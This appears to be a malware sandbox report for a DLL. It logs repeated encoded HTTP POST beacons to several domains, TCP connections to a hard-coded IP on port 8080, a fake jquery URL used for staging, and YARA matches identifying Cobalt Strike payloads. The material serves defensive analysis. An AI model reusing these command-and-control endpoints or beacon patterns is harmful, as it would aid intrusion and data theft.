                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/H0N6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fBM5IDlCe3J+YXp8c2J9ZX0= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8 HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficTCP traffic: 192.168.2.7:49753 -> 23.82.140.206:8080
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000002.519163002.0000000003760000.00000004.00000040.sdmpString found in binary or memory: http://code.jquery.com/
                  Source: loaddll32.exe, 00000000.00000003.265875146.0000000003605000.00000004.00000001.sdmpString found in binary or memory: http://code.jquery.com/1
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                  Source: WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.winI
                  Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/a
                  Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: C8408FE5CA4467EE4DA84A76EF238FE3.0.drString found in binary or memory: http://r3.i.lencr.org/
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                  Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drString found in binary or memory: http://x1.c.lencr.org/0
                  Source: 2D85F72862B55C4EADD9E66E06947F3D.0.drString found in binary or memory: http://x1.i.lencr.org/
                  Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drString found in binary or memory: http://x1.i.lencr.org/0
                  Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://23.82.140.206:8080/
                  Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://23.82.140.206:8080/mpersonation
                  Source: loaddll32.exe, 00000000.00000003.328522826.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com/
                  Source: loaddll32.exe, 00000000.00000003.266948088.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com/v
                  Source: loaddll32.exe, 00000000.00000002.519109976.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.357019934.00000000035FD000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.324864290.0000000003605000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw
                  Source: loaddll32.exe, 00000000.00000003.311329972.0000000003605000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw
                  Source: loaddll32.exe, 00000000.00000003.286730458.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com
                  Source: unknownHTTP traffic detected: POST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1Host: hoteloaktree.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: unknownDNS traffic detected: queries for: hoteloaktree.com
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009622E0 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097088C SetDisplayAutoRotationPreferences,SetGestureConfig,SetInternalWindowPos,SetKeyboardState,SetMagnificationLensCtxInformation,SetMirrorRendering,GetKeyboardState,SetShellWindowEx,
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3Jump to dropped file
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
                  Source: p2SijKiqgZ.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
                  Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
